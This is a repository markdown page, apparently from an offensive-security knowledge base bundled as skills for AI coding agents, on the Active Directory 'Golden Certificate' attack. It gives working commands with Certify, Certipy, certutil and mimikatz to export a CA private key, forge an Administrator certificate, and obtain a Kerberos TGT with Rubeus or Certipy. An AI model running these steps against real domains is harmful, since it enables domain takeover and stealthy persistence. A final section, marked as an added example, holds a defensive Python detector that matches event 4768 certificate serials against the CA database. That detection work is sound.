personas/personas/_shared/internal-allthethings/active-directory/ad-adcs-golden-certificate.md
salvacybersec 448d1cdcd9 feat(install): add OpenCode target + InternalAllTheThings knowledge base
- install_opencode: deploys 29 personas as agents + 1011 skills to
  ~/.config/opencode/{agents,skills}/. Uses OpenCode's markdown+YAML
  agent format (mode/color/permission) and SKILL.md format.
- Topic filter with sensible defaults (drops marketing/biz ~514 skills).
  CLI: --opencode-topics security-offensive,coding-backend,...
- Clone of swisskyrepo/InternalAllTheThings (168 MD, 1.7MB) added to
  _shared/ as a reference trove for AD attack paths, ADCS ESC1-15,
  Kerberos delegation, NTLM relay/coerce, lateral movement, persistence.
- NEO redteam + VORTEX cloud-ad personas reference the new KB with
  MITRE ATT&CK TTP mapping pointers.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-04-16 03:11:44 +03:00


Active Directory - Golden Certificate

A Golden Certificate is a maliciously crafted certificate that an attacker signs with the CA's private key, so it chains to the trusted enterprise CA without ever having been requested from or recorded by it.

Obtain CA certificate

Export the CA certificate including the private key:

  • GhostPack/Certify

    Certify.exe manage-self --dump-certs
    
  • ly4k/Certipy

    certipy ca -u 'administrator@corp.local' -p 'Passw0rd!' -ns '10.10.10.10' -target 'CA.CORP.LOCAL' -config 'CA.CORP.LOCAL\CORP-CA' -backup
    
  • windows-gui/certsrv.msc

    • Open certsrv.msc
    • Right click the CA -> All Tasks -> Back up CA...
    • Follow the wizard but make sure to check Private key and CA certificate
  • windows-gui/certlm.msc

    • Open certlm.msc
    • Go to Personal -> Certificates
    • Right click the CA signing certificate -> All Tasks -> Export
    • Follow the wizard but make sure to choose Yes, export the private key
  • windows-commands/certutil

    certutil -backupKey -f -p SuperSecurePassw0rd! C:\Windows\Tasks\CaBackupFolder
    
  • gentilkiwi/mimikatz

    mimikatz.exe "crypto::capi" "crypto::cng" "crypto::certificates /export"
    

Forge Golden Certificates

Forge a certificate of a target principal:

  • GhostPack/Certify

    Certify.exe forge --ca-cert <pfx-path/base64-pfx> --upn Administrator --sid S-1-5-21-976219687-1556195986-4104514715-500
    
  • GhostPack/ForgeCert

    ForgeCert.exe --CaCertPath "ca.pfx" --CaCertPassword "Password" --Subject "CN=User" --SubjectAltName "administrator@domain.local" --NewCertPath "administrator.pfx" --NewCertPassword "Password"
    
  • ly4k/Certipy

    certipy forge -ca-pfx 'CORP-CA.pfx' -upn 'administrator@corp.local' -sid 'S-1-5-21-...-500' -crl 'ldap:///'
    
    certipy forge -template 'attacker.pfx' -ca-pfx 'CORP-CA.pfx' -upn 'administrator@corp.local' -sid 'S-1-5-21-...-500'
    

⚠️ Useful Certipy parameters when forging a golden certificate.

  • -crl: If -crl is omitted when forging, authentication may fail. While the KDC does not usually perform an active CRL lookup when issuing the initial TGT, for performance reasons, it often checks that the certificate carries a CDP (CRL Distribution Point) extension; its absence can produce a KDC_ERROR_CLIENT_NOT_TRUSTED error.
  • -template 'attacker.pfx': Certipy copies the extensions (Key Usage, Basic Constraints, AIA, etc.) from attacker.pfx into the forged certificate, while still setting the subject, UPN and SID as specified.
  • -subject "CN=xyz-CA-1, DC=xyz, DC=htb": sets the Distinguished Name (subject) of the forged certificate.

Request a TGT

  • GhostPack/Rubeus

    Rubeus.exe asktgt /user:Administrator /domain:dumpster.fire /certificate:<pfx-path/base64-pfx>
    
  • ly4k/Certipy

    certipy auth -pfx 'administrator_forged.pfx' -dc-ip '10.10.10.10'
    
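Defender-side note, as an added example that is not part of the original page or of the InternalAllTheThings repository: a forged certificate is signed with the CA key but never passes through the CA's request pipeline, so its serial number is absent from the CA database, whereas the domain controller's Security event 4768 records the issuer name and serial number of every certificate-based (PKINIT, pre-authentication type 16) TGT request. The script below parses constructed 4768 event text and flags any certificate logon whose (issuer, serial) pair is unknown to a constructed CA-database export. The event field names follow the 4768 message layout; the serial numbers, account names and issuer name are made up for the example.

```python
"""Flag PKINIT TGT requests whose certificate is unknown to the issuing CA.

Added example (not the page's or the project's code). Assumes 4768 event
text with the "Certificate Information" fields and a CA serial export.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample: serials the CA database says it issued, keyed by the
# issuer name as it appears in event 4768. On a real CA these would come
# from an export such as: certutil -view -out "SerialNumber,RequesterName"
CA_ISSUED_SERIALS = {
    "corp-CA": {
        "6100000003a1b2c3d4e5f60000000003",
        "6100000004f1e2d3c4b5a60000000004",
    }
}

# Constructed sample of three 4768 events (abridged), separated by "=====".
SAMPLE_EVENTS = """\
A Kerberos authentication ticket (TGT) was requested.
Account Information:
    Account Name:       jdoe
    Supplied Realm Name:    CORP.LOCAL
Additional Information:
    Result Code:        0x0
    Pre-Authentication Type:    2
=====
A Kerberos authentication ticket (TGT) was requested.
Account Information:
    Account Name:       jsmith
    Supplied Realm Name:    CORP.LOCAL
Additional Information:
    Result Code:        0x0
    Pre-Authentication Type:    16
Certificate Information:
    Certificate Issuer Name:    corp-CA
    Certificate Serial Number:  6100000003A1B2C3D4E5F60000000003
    Certificate Thumbprint:     0123456789abcdef0123456789abcdef01234567
=====
A Kerberos authentication ticket (TGT) was requested.
Account Information:
    Account Name:       Administrator
    Supplied Realm Name:    CORP.LOCAL
Additional Information:
    Result Code:        0x0
    Pre-Authentication Type:    16
Certificate Information:
    Certificate Issuer Name:    corp-CA
    Certificate Serial Number:  4F2A9C1E7B3D55F6
    Certificate Thumbprint:     89abcdef0123456789abcdef0123456789abcdef
"""


@dataclass
class PkinitLogon:
    account: str
    issuer: str
    serial: str       # normalised: lowercase hex, no spaces
    result_code: str


# Only the fields the check needs; "Supplied Realm Name" etc. are ignored.
FIELD_RE = re.compile(
    r"^\s*(Account Name|Certificate Issuer Name|Certificate Serial Number|Result Code):\s*(.*?)\s*$",
    re.M,
)


def parse_4768_events(text: str) -> list[PkinitLogon]:
    """Return one PkinitLogon per event that carries certificate information."""
    logons = []
    for block in re.split(r"^={3,}\s*$", text, flags=re.M):
        fields = dict(FIELD_RE.findall(block))
        serial = fields.get("Certificate Serial Number", "")
        if not serial:
            continue  # password-based TGT request, nothing to cross-check
        logons.append(PkinitLogon(
            account=fields.get("Account Name", ""),
            issuer=fields.get("Certificate Issuer Name", ""),
            serial=serial.lower().replace(" ", ""),
            result_code=fields.get("Result Code", ""),
        ))
    return logons


def find_unknown_certificates(logons: list[PkinitLogon],
                              ca_db: dict[str, set[str]]) -> list[PkinitLogon]:
    """Logons whose certificate serial the named issuer never recorded.

    An issuer name missing from ca_db entirely is also flagged, since that
    points at a certificate chaining to a CA we do not track.
    """
    return [l for l in logons if l.serial not in ca_db.get(l.issuer, set())]


if __name__ == "__main__":
    for hit in find_unknown_certificates(parse_4768_events(SAMPLE_EVENTS), CA_ISSUED_SERIALS):
        print(f"ALERT: {hit.account} authenticated with serial {hit.serial} "
              f"from {hit.issuer!r}, which is not in the CA database")
```

On real data the two inputs are the CA's own database (`certutil -view` on the CA server) and 4768 events collected from every domain controller; a successful PKINIT logon (Result Code 0x0) with a serial the CA never issued is the signature of a golden certificate, and the same comparison catches certificates issued from a CA backup restored elsewhere.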

References